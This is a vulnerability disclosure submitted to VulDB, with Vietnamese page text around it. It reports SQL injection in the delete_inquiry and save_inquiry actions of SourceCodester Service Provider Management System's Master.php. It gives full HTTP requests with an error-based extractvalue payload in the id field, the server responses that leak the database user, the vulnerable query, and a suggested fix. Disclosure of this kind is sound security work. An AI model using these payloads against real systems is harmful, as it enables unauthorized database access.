Gửi #181587: SourceCodester Service Provider Management System Master.php sql injectionthông tin

tiêu đềSourceCodester Service Provider Management System Master.php sql injection
Mô tảI have discovered SQL injection vulnerability in the SourceCodester Service Provider Management System(https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html) The first one affect the file /classes/Master.php?f=delete_inquiry: POST /php-spms/classes/Master.php?f=delete_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------1145489724316963112447700229 Content-Length: 734 Origin: http://localhost Connection: close Referer: http://localhost/php-spms/admin/?page=services/manage_service Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------1145489724316963112447700229 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------1145489724316963112447700229 Content-Disposition: form-data; name="name" 111 -----------------------------1145489724316963112447700229 Content-Disposition: form-data; name="description" <p>111</p> -----------------------------1145489724316963112447700229 Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream -----------------------------1145489724316963112447700229 Content-Disposition: form-data; name="status" 1 -----------------------------1145489724316963112447700229-- And it returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}". This proves that there is an error injection vulnerability here Another one affect the file /classes/Master.php?f=save_inquiry: POST /php-spms/classes/Master.php?f=save_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------1145489724316963112447700229 Content-Length: 734 Origin: http://localhost Connection: close Referer: http://localhost/php-spms/admin/?page=services/manage_service Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------1145489724316963112447700229 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------1145489724316963112447700229 Content-Disposition: form-data; name="name" 111 -----------------------------1145489724316963112447700229 Content-Disposition: form-data; name="description" <p>111</p> -----------------------------1145489724316963112447700229 Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream -----------------------------1145489724316963112447700229 Content-Disposition: form-data; name="status" 1 -----------------------------1145489724316963112447700229-- And it returns "{"status":"failed","err":"XPATH syntax error: '~admin@localhost~'[UPDATE `inquiry_list` set `name`='111' , `description`='&lt;p&gt;111&lt;\/p&gt;' , `status`='1' where id = '1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#' ]"}" The reason for the vulnerability is that they all used code “$sql = "UPDATE inquiry_list set {$data} where id = '{$id}' ";”.Because they did not perform sufficient filtering on controllable parameter IDs, resulting in the possibility of being injected by SQL. My repair suggestion is to use mysqli_real_escape_string() to protect the ID parameter from malicious exploitation .
Nguồn⚠️ https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html
Người dùng
 TsingShui (UID 50501)
Đệ trình12/07/2023 12:34 (cách đây 3 những năm)
Kiểm duyệt12/07/2023 18:27 (6 hours later)
Trạng tháiđược chấp nhận
Mục VulDB233890 [SourceCodester Service Provider Management System 1.0 Master.php?f=save_inquiry ID Tiêm SQL]
điểm20

Want to know what is going to be exploited?

We predict KEV entries!